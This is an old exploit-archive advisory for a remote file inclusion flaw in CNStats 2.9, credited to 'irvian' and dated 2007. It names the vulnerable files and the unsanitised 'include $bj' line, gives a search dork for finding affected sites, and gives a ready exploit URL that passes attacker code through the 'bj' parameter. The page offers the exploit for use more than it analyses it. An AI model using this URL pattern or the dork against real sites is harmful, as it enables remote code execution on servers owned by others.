[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CNStats 2.9 (who_r.php bj) Remote File Inclusion Vulnerability
# Published : 2007-04-15
# Author : irvian
# Previous Title : Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit
# Next Title : NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit
CNStats 2.9 (who_r.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# Scripts : CNStats 2.9
# Discovered By : irvian
# scripts site : http://www.cnstats.com/
# dork : "CNStats 2.9"
------------------------------------------------------------------------------------------
bug found:
/reports/who_r.php
/reports/who_s.php
$bk = 't';
include $bj . 'reports/who.php';
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]
# www.Syue.com [2007-04-15]